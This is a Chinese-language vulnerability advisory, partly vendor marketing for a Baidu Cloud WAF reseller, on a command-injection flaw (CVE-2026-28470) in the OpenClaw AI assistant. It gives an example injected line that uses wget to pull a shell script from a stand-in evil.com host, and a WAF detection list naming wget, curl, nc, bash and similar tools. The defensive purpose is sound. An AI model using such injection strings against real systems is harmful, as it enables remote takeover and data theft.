OpenClaw 参数注入漏洞(CVE-2026-28470):攻击者可远程执行任意命令,升级至 2026.2.2 或部署百度云防护 WAF 即可防御

开源 AI 智能助理 OpenClaw 被曝存在一个高危参数注入漏洞(CVE-2026-28470)。攻击者无需任何身份认证,仅通过向 OpenClaw 服务发送精心构造的命令,即可在服务器上执行任意系统命令,完全控制目标主机。该漏洞影响所有 2026.2.2 之前版本,官方已发布安全补丁。在无法立即升级的情况下,部署 百度云防护 WAF 可在网络层实时拦截恶意注入流量,为企业提供“虚拟补丁”级的即时防护。


一、 漏洞核心信息

项目详情
CVE 编号CVE-2026-28470
CNVD 编号CNVD-2026-20006
CVSS 评分10.0(严重) – AV:N/AC:L/Au:N/C:C/I:C/A:C
漏洞类型参数注入(命令注入)
攻击向量网络远程利用
攻击复杂度
所需权限
用户交互不需要
影响产品OpenClaw 开源智能人工助理
受影响版本OpenClaw < 2026.2.2
安全版本OpenClaw 2026.2.2 及以上
官方补丁https://github.com/openclaw/openclaw/security/advisories/GHSA-3hcm-ggvf-rch5

OpenClaw 是一个流行的开源 AI 智能助理,支持自然语言交互、自动化任务执行等功能。该漏洞允许攻击者通过注入命令替换语法,远程执行任意系统命令。


二、 漏洞原理:参数注入如何导致 RCE

2.1 漏洞产生的原因

OpenClaw 在处理用户输入的命令参数时,未对特殊字符(如 ;|&$()` 等)进行充分过滤或转义,导致攻击者可以在正常命令中“注入”额外的恶意系统命令。

典型攻击场景:假设 OpenClaw 提供了一个文件处理功能,用户输入 rename old.txt new.txt。如果攻击者输入 rename old.txt; wget http://evil.com/shell.sh,系统可能先执行文件重命名,然后执行 wget 下载恶意脚本。

2.2 攻击链路

  1. 攻击者通过网络向 OpenClaw 服务发送一个精心构造的恶意指令(例如通过 HTTP API、WebSocket 或命令行接口)。
  2. 由于参数校验缺失,恶意命令中的注入部分被底层系统直接执行。
  3. 攻击者可借此:
  • 反弹 Shell,完全控制服务器
  • 下载并执行挖矿木马、勒索病毒
  • 窃取敏感文件(如数据库配置、用户凭证)
  • 横向渗透内网

2.3 影响范围

OpenClaw 被广泛应用于个人助理、企业自动化、智能客服等场景。该漏洞影响所有 2026.2.2 之前 的版本,包括 2026.1.x、2025.x 等历史版本。由于 OpenClaw 通常以较高权限运行(如 systemd 服务或 Docker 容器 root 用户),成功利用后攻击者可获得极高的系统控制权。


三、 漏洞危害

危害类型具体后果
远程代码执行攻击者可在目标服务器上执行任意系统命令,如 idcurlnc 反弹 Shell
服务器完全失陷写入 Webshell、添加后门用户、安装挖矿程序、加密勒索
数据泄露读取 /etc/passwd、配置文件、数据库密码、API 密钥、用户聊天记录
横向渗透以失陷服务器为跳板攻击内网其他业务系统(如数据库、OA、ERP)
服务可用性破坏通过 rm -rfshutdown 导致服务中断、数据丢失

真实威胁:由于 OpenClaw 可通过 API 对外提供服务,暴露在公网上的实例极易被自动化扫描工具发现并利用。PoC/EXP 已公开,攻击门槛极低。


四、 修复与临时缓解方案

4.1 立即升级(官方推荐)

升级至 OpenClaw 2026.2.2 或更高版本

# 根据官方文档升级
cd openclaw
git pull
git checkout 2026.2.2
make install
# 或使用 Docker 拉取最新镜像
docker pull openclaw/openclaw:latest

4.2 临时缓解(如无法立即升级)

措施操作
限制网络访问在防火墙或安全组中限制 OpenClaw 服务端口(默认 1865)仅允许可信 IP 访问
禁用危险命令修改 OpenClaw 配置,禁用文件操作、系统命令调用等敏感模块(需查阅官方文档)
使用低权限账户运行避免以 root 或管理员权限运行 OpenClaw,使用独立的低权限系统账户
部署 WAF在网络层拦截恶意命令注入流量

五、 百度云防护 WAF:不升级代码也能拦截命令注入

5.1 WAF 如何防御参数注入漏洞?

对于 OpenClaw 的参数注入漏洞,攻击流量中必然包含命令注入特征(如 ;|&$(`\n 等)。百度云防护 WAF 通过语义分析 + 正则匹配,可实时检测并阻断此类恶意请求。

5.2 内置命令注入防护规则

百度云防护 WAF 已内置 命令注入检测规则(规则 ID 4193 Injection.command_inj.A),专门拦截变种的命令注入攻击。该规则覆盖:

  • 常见命令分隔符:;&|&&||
  • 命令替换语法:$(...)`...`
  • 危险命令关键字:wgetcurlncbashshpython -cperl -e
  • 编码混淆自动解码:URL编码、Base64、Unicode转义等

5.3 JA4 指纹识别 + IP 情报库辅助防御

攻击者常使用自动化工具(如 curlpython requestsnuclei)进行漏洞探测。这些工具的 JA4 指纹 固定,百度云防护可通过自定义规则直接封杀。同时,IP 情报库可实时识别并阻断代理 IP、云服务 IP 等常见攻击源。

5.4 规则启用步骤

如果已经接入百度云防护 WAF:

  1. 登录控制台 → 防护配置Web防护内置规则
  2. 搜索规则 ID 4193Injection.command_inj.A
  3. 确认状态为“开启”,处置动作为“拦截”(若为“观察”,请手动修改)

如果尚未接入,欢迎联系 主机吧 获取免费安全评估和接入指导。


六、 总结

CVE-2026-28470 是一个严重级别的命令注入漏洞,影响所有 OpenClaw 2026.2.2 之前的版本。攻击者可远程执行任意命令,完全控制服务器。官方补丁已发布,建议立即升级。对于无法停服升级的生产环境,部署 百度云防护 WAF 可在网络层实时拦截恶意命令注入流量,提供等效于虚拟补丁的即时保护。

推荐行动路径

优先级措施说明
紧急部署百度云防护 WAF,确认规则 4193 生效立即获得虚拟补丁,阻断攻击流量
升级 OpenClaw 至 2026.2.2 或更高版本从根源修复漏洞
限制 OpenClaw 服务端口访问来源 IP减少暴露面
审计历史日志,排查是否已被入侵检查是否有异常命令执行记录

主机吧 | 百度云防护官方合作伙伴
提供 WAF 接入、高防 CDN、高防 IP、高防服务器、SSL 证书一站式服务
让每一次命令注入都无处遁形,让每一台 AI 服务器都固若金汤。

给TA打赏
共{{data.count}}人
人已打赏
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧